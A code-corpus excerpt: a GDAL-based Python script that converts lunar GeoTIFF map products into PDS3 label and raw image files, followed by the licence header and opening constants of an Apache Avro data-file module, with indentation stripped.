# * in all copies or substantial portions of the Software.
# *
# * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# * DEALINGS IN THE SOFTWARE.
# ****************************************************************************/
import sys
import math
from time import strftime
try:
from osgeo import gdal
from osgeo import osr
except:
import gdal
import osr
#/************************************************************************/
#/* Usage() */
#/************************************************************************/
def Usage(theApp):
print( '\nUsage: LMMP_gdal2PDS in.tif output.img') # % theApp)
print( ' optional: to print out image information also send -debug')
print( 'Usage: LMMP_gdal2PDS -debug in.tif output.img\n') # % theApp)
print( 'Note: Currently this routine only supports LMMP products in')
print(' (geographic, equirectangular, polar_stereographic)\n')
sys.exit(1)
def EQUAL(a, b):
return a.lower() == b.lower()
#/************************************************************************/
#/* main() */
#/************************************************************************/
def main( argv = None ):
bComputeMinMax = False
bSample = False
bShowGCPs = True
bShowMetadata = False
bShowRAT=False
debug = False
bStats = False
bApproxStats = True
bShowColorTable = True
bComputeChecksum = False
bReportHistograms = False
pszFilename = None
papszExtraMDDomains = [ ]
pszProjection = None
hTransform = None
bShowFileList = True
dst_img = None
dst_lbl = None
bands = 1
centLat = None
centLon = None
#/* Must process GDAL_SKIP before GDALAllRegister(), but we can't call */
#/* GDALGeneralCmdLineProcessor before it needs the drivers to be registered */
#/* for the --format or --formats options */
#for( i = 1; i < argc; i++ )
#{
# if EQUAL(argv[i],"--config") and i + 2 < argc and EQUAL(argv[i + 1], "GDAL_SKIP"):
# {
# CPLSetConfigOption( argv[i+1], argv[i+2] );
#
# i += 2;
# }
#}
#
#GDALAllRegister();
if argv is None:
argv = sys.argv
argv = gdal.GeneralCmdLineProcessor( argv )
if argv is None:
return 1
nArgc = len(argv)
#/* -------------------------------------------------------------------- */
#/* Parse arguments. */
#/* -------------------------------------------------------------------- */
i = 1
while i < nArgc:
if EQUAL(argv[i], "--utility_version"):
print("%s is running against GDAL %s" %
(argv[0], gdal.VersionInfo("RELEASE_NAME")))
return 0
elif EQUAL(argv[i], "-debug"):
debug = True
elif EQUAL(argv[i], "-mm"):
bComputeMinMax = True
elif EQUAL(argv[i], "-hist"):
bReportHistograms = True
elif EQUAL(argv[i], "-stats"):
bStats = True
bApproxStats = False
elif EQUAL(argv[i], "-approx_stats"):
bStats = True
bApproxStats = True
elif EQUAL(argv[i], "-sample"):
bSample = True
elif EQUAL(argv[i], "-checksum"):
bComputeChecksum = True
elif EQUAL(argv[i], "-nogcp"):
bShowGCPs = False
elif EQUAL(argv[i], "-nomd"):
bShowMetadata = False
elif EQUAL(argv[i], "-norat"):
bShowRAT = False
elif EQUAL(argv[i], "-noct"):
bShowColorTable = False
elif EQUAL(argv[i], "-mdd") and i < nArgc-1:
i = i + 1
papszExtraMDDomains.append( argv[i] )
elif EQUAL(argv[i], "-nofl"):
bShowFileList = False
elif argv[i][0] == '-':
return Usage(argv[0])
elif pszFilename is None:
pszFilename = argv[i]
elif dst_img is None:
dst_img = argv[i]
else:
return Usage(argv[0])
i = i + 1
if pszFilename is None:
return Usage(argv[0])
if dst_img is None:
return Usage(argv[0])
#/* -------------------------------------------------------------------- */
#/* Open dataset. */
#/* -------------------------------------------------------------------- */
hDataset = gdal.Open( pszFilename, gdal.GA_ReadOnly )
if hDataset is None:
print("gdalinfo failed - unable to open '%s'." % pszFilename )
sys.exit(1)
# Open the output file.
if dst_img is not None:
dst_lbl = dst_img.replace("IMG","LBL")
dst_lbl = dst_lbl.replace("img","lbl")
if (EQUAL(dst_lbl,dst_img)):
print('Extension must be .IMG or .img - unable to run using filename: %s' % pszFilename )
sys.exit(1)
else:
f = open(dst_lbl,'wt')
# else:
# f = sys.stdout
# dst_img = "out.img"
#/* -------------------------------------------------------------------- */
#/* Report general info. */
#/* -------------------------------------------------------------------- */
hDriver = hDataset.GetDriver();
if debug:
print( "Driver: %s/%s" % ( \
hDriver.ShortName, \
hDriver.LongName ))
papszFileList = hDataset.GetFileList();
if papszFileList is None or len(papszFileList) == 0:
print( "Files: none associated" )
else:
if debug:
print( "Files: %s" % papszFileList[0] )
if bShowFileList:
for i in range(1, len(papszFileList)):
print( " %s" % papszFileList[i] )
if debug:
print( "Size is %d, %d" % (hDataset.RasterXSize, hDataset.RasterYSize))
#/* -------------------------------------------------------------------- */
#/* Report projection. */
#/* -------------------------------------------------------------------- */
pszProjection = hDataset.GetProjectionRef()
if pszProjection is not None:
hSRS = osr.SpatialReference()
if hSRS.ImportFromWkt(pszProjection ) == gdal.CE_None:
pszPrettyWkt = hSRS.ExportToPrettyWkt(False)
#print( "Coordinate System is:\n%s" % pszPrettyWkt )
mapProjection = "None"
#Extract projection information
target = hSRS.GetAttrValue("DATUM",0).replace("D_","").replace("_2000","")
semiMajor = hSRS.GetSemiMajor() / 1000.0
semiMinor = hSRS.GetSemiMinor() / 1000.0
if (pszProjection[0:6] == "GEOGCS"):
mapProjection = "SIMPLE_CYLINDRICAL"
centLat = 0
centLon = 0
if (pszProjection[0:6] == "PROJCS"):
mapProjection = hSRS.GetAttrValue("PROJECTION",0)
if EQUAL(mapProjection,"Equirectangular"):
centLat = hSRS.GetProjParm('standard_parallel_1')
centLon = hSRS.GetProjParm('central_meridian')
if EQUAL(mapProjection,"Polar_Stereographic"):
centLat = hSRS.GetProjParm('latitude_of_origin')
centLon = hSRS.GetProjParm('central_meridian')
if EQUAL(mapProjection,"Stereographic_South_Pole"):
centLat = hSRS.GetProjParm('latitude_of_origin')
centLon = hSRS.GetProjParm('central_meridian')
if EQUAL(mapProjection,"Stereographic_North_Pole"):
centLat = hSRS.GetProjParm('latitude_of_origin')
centLon = hSRS.GetProjParm('central_meridian')
if debug:
print( "Coordinate System is:\n%s" % pszPrettyWkt )
else:
print( "Warning - Can't parse this type of projection\n" )
print( "Coordinate System is `%s'" % pszProjection )
sys.exit(1)
else:
print( "Warning - No Coordinate System defined:\n" )
sys.exit(1)
#/* -------------------------------------------------------------------- */
#/* Report Geotransform. */
#/* -------------------------------------------------------------------- */
adfGeoTransform = hDataset.GetGeoTransform(can_return_null = True)
if adfGeoTransform is not None:
if adfGeoTransform[2] == 0.0 and adfGeoTransform[4] == 0.0:
if debug:
print( "Origin = (%.15f,%.15f)" % ( \
adfGeoTransform[0], adfGeoTransform[3] ))
print( "Pixel Size = (%.15f,%.15f)" % ( \
adfGeoTransform[1], adfGeoTransform[5] ))
else:
if debug:
print( "GeoTransform =\n" \
" %.16g, %.16g, %.16g\n" \
" %.16g, %.16g, %.16g" % ( \
adfGeoTransform[0], \
adfGeoTransform[1], \
adfGeoTransform[2], \
adfGeoTransform[3], \
adfGeoTransform[4], \
adfGeoTransform[5] ))
if (pszProjection[0:6] == "GEOGCS"):
#convert degrees/pixel to km/pixel
mapres = 1 / adfGeoTransform[1]
kmres = adfGeoTransform[1] * (semiMajor * math.pi / 180.0)
else:
#convert m/pixel to pixel/degree
mapres = 1 / (adfGeoTransform[1] / (semiMajor * 1000.0 * math.pi / 180.0))
kmres = adfGeoTransform[1] / 1000.0
#/* -------------------------------------------------------------------- */
#/* Report GCPs. */
#/* -------------------------------------------------------------------- */
if bShowGCPs and hDataset.GetGCPCount() > 0:
pszProjection = hDataset.GetGCPProjection()
if pszProjection is not None:
hSRS = osr.SpatialReference()
if hSRS.ImportFromWkt(pszProjection ) == gdal.CE_None:
pszPrettyWkt = hSRS.ExportToPrettyWkt(False)
if debug:
print( "GCP Projection = \n%s" % pszPrettyWkt )
else:
if debug:
print( "GCP Projection = %s" % \
pszProjection )
gcps = hDataset.GetGCPs()
i = 0
for gcp in gcps:
if debug:
print( "GCP[%3d]: Id=%s, Info=%s\n" \
" (%.15g,%.15g) -> (%.15g,%.15g,%.15g)" % ( \
i, gcp.Id, gcp.Info, \
gcp.GCPPixel, gcp.GCPLine, \
gcp.GCPX, gcp.GCPY, gcp.GCPZ ))
i = i + 1
#/* -------------------------------------------------------------------- */
#/* Report metadata. */
#/* -------------------------------------------------------------------- */
if debug:
if bShowMetadata:
papszMetadata = hDataset.GetMetadata_List()
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( "Metadata:" )
for metadata in papszMetadata:
print( " %s" % metadata )
if bShowMetadata:
for extra_domain in papszExtraMDDomains:
papszMetadata = hDataset.GetMetadata_List(extra_domain)
if papszMetadata is not None and len(papszMetadata) > 0 :
print( "Metadata (%s):" % extra_domain)
for metadata in papszMetadata:
print( " %s" % metadata )
#/* -------------------------------------------------------------------- */
#/* Report "IMAGE_STRUCTURE" metadata. */
#/* -------------------------------------------------------------------- */
if bShowMetadata:
papszMetadata = hDataset.GetMetadata_List("IMAGE_STRUCTURE")
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( "Image Structure Metadata:" )
for metadata in papszMetadata:
print( " %s" % metadata )
#/* -------------------------------------------------------------------- */
#/* Report subdatasets. */
#/* -------------------------------------------------------------------- */
papszMetadata = hDataset.GetMetadata_List("SUBDATASETS")
if papszMetadata is not None and len(papszMetadata) > 0 :
print( "Subdatasets:" )
for metadata in papszMetadata:
print( " %s" % metadata )
#/* -------------------------------------------------------------------- */
#/* Report geolocation. */
#/* -------------------------------------------------------------------- */
if bShowMetadata:
papszMetadata = hDataset.GetMetadata_List("GEOLOCATION")
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( "Geolocation:" )
for metadata in papszMetadata:
print( " %s" % metadata )
#/* -------------------------------------------------------------------- */
#/* Report RPCs */
#/* -------------------------------------------------------------------- */
if bShowMetadata:
papszMetadata = hDataset.GetMetadata_List("RPC")
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( "RPC Metadata:" )
for metadata in papszMetadata:
print( " %s" % metadata )
#/* -------------------------------------------------------------------- */
#/* Setup projected to lat/long transform if appropriate. */
#/* -------------------------------------------------------------------- */
if pszProjection is not None and len(pszProjection) > 0:
hProj = osr.SpatialReference( pszProjection )
if hProj is not None:
hLatLong = hProj.CloneGeogCS()
if hLatLong is not None:
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
hTransform = osr.CoordinateTransformation( hProj, hLatLong )
gdal.PopErrorHandler()
if gdal.GetLastErrorMsg().find( 'Unable to load PROJ.4 library' ) != -1:
hTransform = None
#/* -------------------------------------------------------------------- */
#/* Report corners. */
#/* -------------------------------------------------------------------- */
if debug:
print( "Corner Coordinates:" )
GDALInfoReportCorner( hDataset, hTransform, "Upper Left", \
0.0, 0.0 );
GDALInfoReportCorner( hDataset, hTransform, "Lower Left", \
0.0, hDataset.RasterYSize);
GDALInfoReportCorner( hDataset, hTransform, "Upper Right", \
hDataset.RasterXSize, 0.0 );
GDALInfoReportCorner( hDataset, hTransform, "Lower Right", \
hDataset.RasterXSize, \
hDataset.RasterYSize );
GDALInfoReportCorner( hDataset, hTransform, "Center", \
hDataset.RasterXSize/2.0, \
hDataset.RasterYSize/2.0 );
#Get bounds
ulx = GDALGetLon( hDataset, hTransform, 0.0, 0.0 );
uly = GDALGetLat( hDataset, hTransform, 0.0, 0.0 );
lrx = GDALGetLon( hDataset, hTransform, hDataset.RasterXSize, \
hDataset.RasterYSize );
lry = GDALGetLat( hDataset, hTransform, hDataset.RasterXSize, \
hDataset.RasterYSize );
#/* ==================================================================== */
#/* Loop over bands. */
#/* ==================================================================== */
if debug:
bands = hDataset.RasterCount
for iBand in range(hDataset.RasterCount):
hBand = hDataset.GetRasterBand(iBand+1 )
#if( bSample )
#{
# float afSample[10000];
# int nCount;
#
# nCount = GDALGetRandomRasterSample( hBand, 10000, afSample );
# print( "Got %d samples.\n", nCount );
#}
(nBlockXSize, nBlockYSize) = hBand.GetBlockSize()
print( "Band %d Block=%dx%d Type=%s, ColorInterp=%s" % ( iBand+1, \
nBlockXSize, nBlockYSize, \
gdal.GetDataTypeName(hBand.DataType), \
gdal.GetColorInterpretationName( \
hBand.GetRasterColorInterpretation()) ))
if hBand.GetDescription() is not None \
and len(hBand.GetDescription()) > 0 :
print( " Description = %s" % hBand.GetDescription() )
dfMin = hBand.GetMinimum()
dfMax = hBand.GetMaximum()
if dfMin is not None or dfMax is not None or bComputeMinMax:
line = " "
if dfMin is not None:
line = line + ("Min=%.3f " % dfMin)
if dfMax is not None:
line = line + ("Max=%.3f " % dfMax)
if bComputeMinMax:
gdal.ErrorReset()
adfCMinMax = hBand.ComputeRasterMinMax(False)
if gdal.GetLastErrorType() == gdal.CE_None:
line = line + ( " Computed Min/Max=%.3f,%.3f" % ( \
adfCMinMax[0], adfCMinMax[1] ))
print( line )
stats = hBand.GetStatistics( bApproxStats, bStats)
# Dirty hack to recognize if stats are valid. If invalid, the returned
# stddev is negative
if stats[3] >= 0.0:
print( " Minimum=%.3f, Maximum=%.3f, Mean=%.3f, StdDev=%.3f" % ( \
stats[0], stats[1], stats[2], stats[3] ))
if bReportHistograms:
hist = hBand.GetDefaultHistogram(force = True, callback = gdal.TermProgress)
if hist is not None:
dfMin = hist[0]
dfMax = hist[1]
nBucketCount = hist[2]
panHistogram = hist[3]
print( " %d buckets from %g to %g:" % ( \
nBucketCount, dfMin, dfMax ))
line = ' '
for bucket in panHistogram:
line = line + ("%d " % bucket)
print(line)
if bComputeChecksum:
print( " Checksum=%d" % hBand.Checksum())
dfNoData = hBand.GetNoDataValue()
if dfNoData is not None:
if dfNoData != dfNoData:
print( " NoData Value=nan" )
else:
print( " NoData Value=%.18g" % dfNoData )
if hBand.GetOverviewCount() > 0:
line = " Overviews: "
for iOverview in range(hBand.GetOverviewCount()):
if iOverview != 0 :
line = line + ", "
hOverview = hBand.GetOverview( iOverview );
if hOverview is not None:
line = line + ( "%dx%d" % (hOverview.XSize, hOverview.YSize))
pszResampling = \
hOverview.GetMetadataItem( "RESAMPLING", "" )
if pszResampling is not None \
and len(pszResampling) >= 12 \
and EQUAL(pszResampling[0:12],"AVERAGE_BIT2"):
line = line + "*"
else:
line = line + "(null)"
print(line)
if bComputeChecksum:
line = " Overviews checksum: "
for iOverview in range(hBand.GetOverviewCount()):
if iOverview != 0:
line = line + ", "
hOverview = hBand.GetOverview( iOverview );
if hOverview is not None:
line = line + ( "%d" % hOverview.Checksum())
else:
line = line + "(null)"
print(line)
if hBand.HasArbitraryOverviews():
print( " Overviews: arbitrary" )
nMaskFlags = hBand.GetMaskFlags()
if (nMaskFlags & (gdal.GMF_NODATA|gdal.GMF_ALL_VALID)) == 0:
hMaskBand = hBand.GetMaskBand()
line = " Mask Flags: "
if (nMaskFlags & gdal.GMF_PER_DATASET) != 0:
line = line + "PER_DATASET "
if (nMaskFlags & gdal.GMF_ALPHA) != 0:
line = line + "ALPHA "
if (nMaskFlags & gdal.GMF_NODATA) != 0:
line = line + "NODATA "
if (nMaskFlags & gdal.GMF_ALL_VALID) != 0:
line = line + "ALL_VALID "
print(line)
if hMaskBand is not None and \
hMaskBand.GetOverviewCount() > 0:
line = " Overviews of mask band: "
for iOverview in range(hMaskBand.GetOverviewCount()):
if iOverview != 0:
line = line + ", "
hOverview = hMaskBand.GetOverview( iOverview );
if hOverview is not None:
line = line + ( "%d" % hOverview.Checksum())
else:
line = line + "(null)"
if len(hBand.GetUnitType()) > 0:
print( " Unit Type: %s" % hBand.GetUnitType())
papszCategories = hBand.GetRasterCategoryNames()
if papszCategories is not None:
print( " Categories:" );
i = 0
for category in papszCategories:
print( " %3d: %s" % (i, category) )
i = i + 1
if hBand.GetScale() != 1.0 or hBand.GetOffset() != 0.0:
print( " Offset: %.15g, Scale:%.15g" % \
( hBand.GetOffset(), hBand.GetScale()))
if bShowMetadata:
papszMetadata = hBand.GetMetadata_List()
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( " Metadata:" )
for metadata in papszMetadata:
print( " %s" % metadata )
if bShowMetadata:
papszMetadata = hBand.GetMetadata_List("IMAGE_STRUCTURE")
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( " Image Structure Metadata:" )
for metadata in papszMetadata:
print( " %s" % metadata )
hTable = hBand.GetRasterColorTable()
if hBand.GetRasterColorInterpretation() == gdal.GCI_PaletteIndex \
and hTable is not None:
print( " Color Table (%s with %d entries)" % (\
gdal.GetPaletteInterpretationName( \
hTable.GetPaletteInterpretation( )), \
hTable.GetCount() ))
if bShowColorTable:
for i in range(hTable.GetCount()):
sEntry = hTable.GetColorEntry(i)
print( " %3d: %d,%d,%d,%d" % ( \
i, \
sEntry[0],\
sEntry[1],\
sEntry[2],\
sEntry[3] ))
if bShowRAT:
hRAT = hBand.GetDefaultRAT()
#GDALRATDumpReadable( hRAT, None );
#/************************************************************************/
#/* WritePDSlabel() */
#/************************************************************************/
#def WritePDSlabel(outFile, DataSetID, pszFilename, sampleBits, lines, samples):
instrList = pszFilename.split("_")
hBand = hDataset.GetRasterBand( 1 )
#get the datatype
if EQUAL(gdal.GetDataTypeName(hBand.DataType), "Float32"):
sample_bits = 32
sample_type = "PC_REAL"
sample_mask = "2#11111111111111111111111111111111#"
elif EQUAL(gdal.GetDataTypeName(hBand.DataType), "INT16"):
sample_bits = 16
sample_type = "LSB_INTEGER"
sample_mask = "2#1111111111111111#"
elif EQUAL(gdal.GetDataTypeName(hBand.DataType), "UINT16"):
sample_bits = 16
sample_type = "UNSIGNED_INTEGER"
sample_mask = "2#1111111111111111#"
elif EQUAL(gdal.GetDataTypeName(hBand.DataType), "Byte"):
sample_bits = 8
sample_type = "UNSIGNED_INTEGER"
sample_mask = "2#11111111#"
else:
print( " %s: Not supported pixel type" % gdal.GetDataTypeName(hBand.DataType))
sys.exit(1)
f.write('PDS_VERSION_ID = PDS3\n')
f.write('\n')
f.write('/* The source image data definition. */\n')
f.write('FILE_NAME = \"%s\"\n' % (dst_img))
f.write('RECORD_TYPE = FIXED_LENGTH\n')
f.write('RECORD_BYTES = %d\n' % (hDataset.RasterYSize))
f.write('FILE_RECORDS = %d\n' % ((hDataset.RasterXSize * sample_bits / 8)) )
#f.write('LABEL_RECORDS = 1\n')
f.write('^IMAGE = \"%s\"\n' % (dst_img))
f.write('\n')
f.write('/* Identification Information */\n')
f.write('DATA_SET_ID = "%s"\n' % pszFilename.split(".")[0])
f.write('DATA_SET_NAME = "%s"\n' % pszFilename.split(".")[0])
f.write('PRODUCER_INSTITUTION_NAME = "Lunar Mapping and Modeling Project"\n')
f.write('PRODUCER_ID = "LMMP_TEAM"\n')
f.write('PRODUCER_FULL_NAME = "LMMP TEAM"\n')
f.write('PRODUCT_ID = "%s"\n' % pszFilename.split(".")[0])
if "_v" in pszFilename:
f.write('PRODUCT_VERSION_ID = "%s.0"\n' % instrList[-1].split(".")[0].upper())
else:
f.write('PRODUCT_VERSION_ID = "%s"\n' % "V1.0")
f.write('PRODUCT_TYPE = "RDR"\n')
if len(instrList) > 1:
f.write('INSTRUMENT_HOST_NAME = "%s"\n' % instrList[0])
f.write('INSTRUMENT_HOST_ID = "%s"\n' % instrList[0])
f.write('INSTRUMENT_NAME = "%s"\n' % instrList[1])
f.write('INSTRUMENT_ID = "%s"\n' % instrList[1])
f.write('TARGET_NAME = MOON\n')
f.write('MISSION_PHASE_NAME = "POST MISSION"\n')
f.write('RATIONALE_DESC = "Created at the request of NASA\'s Exploration\n')
f.write(' Systems Mission Directorate to support future\n')
f.write(' human exploration"\n')
f.write('SOFTWARE_NAME = "ISIS 3.2.1 | SOCET SET v5.5 (r) BAE Systems\n')
f.write(' | GDAL 1.8"\n')
f.write('\n')
f.write('/* Time Parameters */\n')
f.write('START_TIME = "N/A"\n')
f.write('STOP_TIME = "N/A"\n')
f.write('SPACECRAFT_CLOCK_START_COUNT = "N/A"\n')
f.write('SPACECRAFT_CLOCK_STOP_COUNT = "N/A"\n')
f.write('PRODUCT_CREATION_TIME = %s\n' % strftime("%Y-%m-%dT%H:%M:%S")) #2011-03-11T22:13:40
f.write('\n')
f.write('OBJECT = IMAGE_MAP_PROJECTION\n')
f.write(' ^DATA_SET_MAP_PROJECTION = "DSMAP.CAT"\n')
f.write(' MAP_PROJECTION_TYPE = \"%s\"\n' % mapProjection)
f.write(' PROJECTION_LATITUDE_TYPE = PLANETOCENTRIC\n')
f.write(' A_AXIS_RADIUS = %.1f <KM>\n' % semiMajor)
f.write(' B_AXIS_RADIUS = %.1f <KM>\n' % semiMajor)
f.write(' C_AXIS_RADIUS = %.1f <KM>\n' % semiMinor)
f.write(' COORDINATE_SYSTEM_NAME = PLANETOCENTRIC\n')
f.write(' POSITIVE_LONGITUDE_DIRECTION = EAST\n')
f.write(' KEYWORD_LATITUDE_TYPE = PLANETOCENTRIC\n')
f.write(' /* NOTE: CENTER_LATITUDE and CENTER_LONGITUDE describe the location */\n')
f.write(' /* of the center of projection, which is not necessarily equal to the */\n')
f.write(' /* location of the center point of the image. */\n')
if (centLat != None):
f.write(' CENTER_LATITUDE = %5.2f <DEG>\n' % centLat)
if (centLon != None):
f.write(' CENTER_LONGITUDE = %5.2f <DEG>\n' % centLon)
f.write(' LINE_FIRST_PIXEL = 1\n')
f.write(' LINE_LAST_PIXEL = %d\n' % hDataset.RasterYSize)
f.write(' SAMPLE_FIRST_PIXEL = 1\n')
f.write(' SAMPLE_LAST_PIXEL = %d\n' % hDataset.RasterXSize)
f.write(' MAP_PROJECTION_ROTATION = 0.0 <DEG>\n')
f.write(' MAP_RESOLUTION = %.4f <PIX/DEG>\n' % mapres )
f.write(' MAP_SCALE = %.8f <KM/PIXEL>\n' % kmres )
f.write(' MINIMUM_LATITUDE = %.8f <DEGREE>\n' % lry)
f.write(' MAXIMUM_LATITUDE = %.8f <DEGREE>\n' % uly)
f.write(' WESTERNMOST_LONGITUDE = %.8f <DEGREE>\n' % ulx)
f.write(' EASTERNMOST_LONGITUDE = %.8f <DEGREE>\n' % lrx)
f.write(' LINE_PROJECTION_OFFSET = %.1f\n' % ( (ulx / kmres * 1000 ) - 0.5 ))
f.write(' SAMPLE_PROJECTION_OFFSET = %.1f\n' % ( (uly / kmres * 1000 ) + 0.5 ))
f.write('END_OBJECT = IMAGE_MAP_PROJECTION\n')
f.write('\n')
f.write('OBJECT = IMAGE\n')
f.write(' NAME = \"%s\"\n' % (pszFilename))
f.write(' DESCRIPTION = "Export data set from LMMP portal.\n')
f.write(' see filename for data type."\n')
#f.write('\n')
f.write(' LINES = %d\n' % hDataset.RasterYSize)
f.write(' LINE_SAMPLES = %d\n' % hDataset.RasterXSize)
f.write(' UNIT = METER\n')
f.write(' OFFSET = %.10g\n' % ( hBand.GetOffset() ))
f.write(' SCALING_FACTOR = %.10g\n' % ( hBand.GetScale() ))
f.write(' SAMPLE_TYPE = %s\n' % (sample_type) )
f.write(' SAMPLE_BITS = %d\n' % (sample_bits) )
f.write(' SAMPLE_BIT_MASK = %s\n' % (sample_mask) )
#f.write('\n')
f.write(' BANDS = %d\n' % hDataset.RasterCount)
#f.write('\n')
f.write(' BAND_STORAGE_TYPE = BAND_SEQUENTIAL\n')
if (sample_bits == 32) :
f.write(' CORE_NULL = 16#FF7FFFFB#\n')
f.write(' CORE_LOW_REPR_SATURATION = 16#FF7FFFFC#\n')
f.write(' CORE_LOW_INSTR_SATURATION = 16#FF7FFFFD#\n')
f.write(' CORE_HIGH_REPR_SATURATION = 16#FF7FFFFF#\n')
f.write(' CORE_HIGH_INSTR_SATURATION = 16#FF7FFFFE#\n')
elif (sample_bits == 16) :
f.write(' CORE_NULL = -32768\n')
f.write(' CORE_LOW_REPR_SATURATION = -32767\n')
f.write(' CORE_LOW_INSTR_SATURATION = -32766\n')
f.write(' CORE_HIGH_REPR_SATURATION = 32767\n')
f.write(' CORE_HIGH_INSTR_SATURATION = 32768\n')
else : #8bit
f.write(' CORE_NULL = 0\n')
f.write(' CORE_LOW_REPR_SATURATION = 0\n')
f.write(' CORE_LOW_INSTR_SATURATION = 0\n')
f.write(' CORE_HIGH_REPR_SATURATION = 255\n')
f.write(' CORE_HIGH_INSTR_SATURATION = 255\n')
f.write('END_OBJECT = IMAGE\n')
f.write('END\n')
f.close()
#########################
#Export out raw image
#########################
#Setup the output dataset
print ('Please wait, writing out raw image: %s' % dst_img)
driver = gdal.GetDriverByName('ENVI')
output = driver.CreateCopy(dst_img, hDataset, 1)
print ('Complete. PDS label also created: %s' % dst_lbl)
return 0
#/************************************************************************/
#/* GDALInfoReportCorner() */
#/************************************************************************/
def GDALInfoReportCorner( hDataset, hTransform, corner_name, x, y ):
line = "%-11s " % corner_name
#/* -------------------------------------------------------------------- */
#/* Transform the point into georeferenced coordinates. */
#/* -------------------------------------------------------------------- */
adfGeoTransform = hDataset.GetGeoTransform(can_return_null = True)
if adfGeoTransform is not None:
dfGeoX = adfGeoTransform[0] + adfGeoTransform[1] * x \
+ adfGeoTransform[2] * y
dfGeoY = adfGeoTransform[3] + adfGeoTransform[4] * x \
+ adfGeoTransform[5] * y
else:
line = line + ("(%7.1f,%7.1f)" % (x, y ))
print(line)
return False
#/* -------------------------------------------------------------------- */
#/* Report the georeferenced coordinates. */
#/* -------------------------------------------------------------------- */
if abs(dfGeoX) < 181 and abs(dfGeoY) < 91:
line = line + ( "(%12.7f,%12.7f) " % (dfGeoX, dfGeoY ))
else:
line = line + ( "(%12.3f,%12.3f) " % (dfGeoX, dfGeoY ))
#/* -------------------------------------------------------------------- */
#/* Transform to latlong and report. */
#/* -------------------------------------------------------------------- */
if hTransform is not None:
pnt = hTransform.TransformPoint(dfGeoX, dfGeoY, 0)
if pnt is not None:
line = line + ( "(%s," % gdal.DecToDMS( pnt[0], "Long", 2 ) )
line = line + ( "%s)" % gdal.DecToDMS( pnt[1], "Lat", 2 ) )
print(line)
return True
#/************************************************************************/
#/* GDALGetLon() */
#/************************************************************************/
def GDALGetLon( hDataset, hTransform, x, y ):
#/* -------------------------------------------------------------------- */
#/* Transform the point into georeferenced coordinates. */
#/* -------------------------------------------------------------------- */
adfGeoTransform = hDataset.GetGeoTransform(can_return_null = True)
if adfGeoTransform is not None:
dfGeoX = adfGeoTransform[0] + adfGeoTransform[1] * x \
+ adfGeoTransform[2] * y
dfGeoY = adfGeoTransform[3] + adfGeoTransform[4] * x \
+ adfGeoTransform[5] * y
else:
return 0.0
#/* -------------------------------------------------------------------- */
#/* Transform to latlong and report. */
#/* -------------------------------------------------------------------- */
if hTransform is not None:
pnt = hTransform.TransformPoint(dfGeoX, dfGeoY, 0)
if pnt is not None:
return pnt[0]
return dfGeoX
#/************************************************************************/
#/* GDALGetLat() */
#/************************************************************************/
def GDALGetLat( hDataset, hTransform, x, y ):
#/* -------------------------------------------------------------------- */
#/* Transform the point into georeferenced coordinates. */
#/* -------------------------------------------------------------------- */
adfGeoTransform = hDataset.GetGeoTransform(can_return_null = True)
if adfGeoTransform is not None:
dfGeoX = adfGeoTransform[0] + adfGeoTransform[1] * x \
+ adfGeoTransform[2] * y
dfGeoY = adfGeoTransform[3] + adfGeoTransform[4] * x \
+ adfGeoTransform[5] * y
else:
return 0.0
#/* -------------------------------------------------------------------- */
#/* Transform to latlong and report. */
#/* -------------------------------------------------------------------- */
if hTransform is not None:
pnt = hTransform.TransformPoint(dfGeoX, dfGeoY, 0)
if pnt is not None:
return pnt[1]
return dfGeoY
if __name__ == '__main__':
version_num = int(gdal.VersionInfo('VERSION_NUM'))
if version_num < 1800: # because of GetGeoTransform(can_return_null)
print('ERROR: Python bindings of GDAL 1.8.0 or later required')
sys.exit(1)
sys.exit(main(sys.argv))
| USGS-Astrogeology/GDAL_scripts | gdal2ISIS3/LMMP_gdal2PDS.py | Python | unlicense | 40,880 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Read/Write Avro File Object Containers.
"""
from six import BytesIO
import six
import zlib
from avro import schema
from avro import io
try:
import snappy
has_snappy = True
except ImportError:
has_snappy = False
#
# Constants
#
VERSION = 1
MAGIC = b'Obj' + six.int2byte(VERSION)
MAGIC_SIZE = len(MAGIC)
SYNC_SIZE = 16
SYNC_INTERVAL = 4000 * SYNC_SIZE # TODO(hammer): make configurable
META_SCHEMA = schema.parse("""\
{"type": "record", "name": "org.apache.avro.file.Header",
"fields" : [
{"name": "magic", "type": {"type": "fixed", "name": "magic", "size": %d}},
{"name": "meta", "type": {"type": "map", "values": "bytes"}},
{"name": "sync", "type": {"type": "fixed", "name": "sync", "size": %d}}]}
""" % (MAGIC_SIZE, SYNC_SIZE))
VALID_CODECS = ['null', 'deflate']
if has_snappy:
VALID_CODECS.append('snappy')
VALID_ENCODINGS = ['binary'] # not used yet
CODEC_KEY = "avro.codec"
SCHEMA_KEY = "avro.schema"
#
# Exceptions
#
class DataFileException(schema.AvroException):
"""
Raised when there's a problem reading or writing file object containers.
"""
def __init__(self, fail_msg):
